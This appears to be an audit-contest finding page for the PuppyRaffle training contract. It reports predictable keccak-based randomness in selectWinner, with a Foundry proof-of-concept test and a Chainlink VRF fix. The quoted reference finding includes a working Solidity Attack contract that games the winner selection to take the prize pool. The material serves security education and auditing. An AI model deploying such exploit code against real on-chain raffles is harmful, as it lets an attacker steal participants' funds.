Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Predictable randomness in selectWinner

fyuryy

Predictable randomness in `PuppyRaffle::selectWinner` allows anyone to predetermine the winner

Description

The selectWinner function determines the raffle winner using a hash of msg.sender, block.timestamp, and block.difficulty. These values are all known or manipulable by miners/validators, making the "randomness" entirely predictable.

A malicious actor (especially a validator) can compute the winner index off-chain before calling selectWinner, or simply choose when to call the function such that they (or an accomplice) win. Even non-validators can simulate the outcome and only call selectWinner when the result is favorable.

function selectWinner() external {

require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");

require(players.length >= 4, "PuppyRaffle: Need at least 4 players");

@> uint256 winnerIndex =

@> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

address winner = players[winnerIndex];

// ...

}

Risk

Likelihood:

All inputs to the hash (msg.sender, block.timestamp, block.difficulty) are publicly known or predictable at the time of the call
Any user can simulate the keccak256 computation off-chain and choose the optimal time/address to call selectWinner

Impact:

An attacker can guarantee they win the raffle prize (80% of all entrance fees)
The raffle is fundamentally unfair -- honest participants have no real chance against an informed attacker

Proof of Concept

Four players enter the raffle normally via the playersEntered modifier.
We warp time past the raffle duration and advance the block number so selectWinner can be called.
Before calling selectWinner, we replicate the exact same keccak256 computation used inside the contract: keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty)) % 4. Since msg.sender will be address(this) (the test contract) and block.timestamp/block.difficulty are already known, the result is fully deterministic.
We look up the player at the predicted index to get the expected winner address.
We then call selectWinner() and assert that previousWinner matches our prediction exactly.
This proves that any caller can compute the winner before the transaction executes and choose whether to call (or not call) based on the result.

function testPredictWinner() public playersEntered {

vm.warp(block.timestamp + duration + 1);

vm.roll(block.number + 1);

// Attacker predicts the winner off-chain using the same formula

uint256 expectedWinnerIndex = uint256(

keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))

) % 4;

address expectedWinner = puppyRaffle.players(expectedWinnerIndex);

puppyRaffle.selectWinner();

// The prediction matches the actual winner

assertEq(puppyRaffle.previousWinner(), expectedWinner);

}

Recommended Mitigation

Use a cryptographically secure source of randomness such as Chainlink VRF:

+ import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.7/VRFConsumerBaseV2.sol";

- uint256 winnerIndex =

- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

+ // Request randomness from Chainlink VRF

+ uint256 requestId = COORDINATOR.requestRandomWords(

+ keyHash,

+ subscriptionId,

+ requestConfirmations,

+ callbackGasLimit,

+ numWords

+ );

+ // In the VRF callback:

+ function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {

+ uint256 winnerIndex = randomWords[0] % players.length;

+ // ... rest of winner selection logic

+ }

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 1 day ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!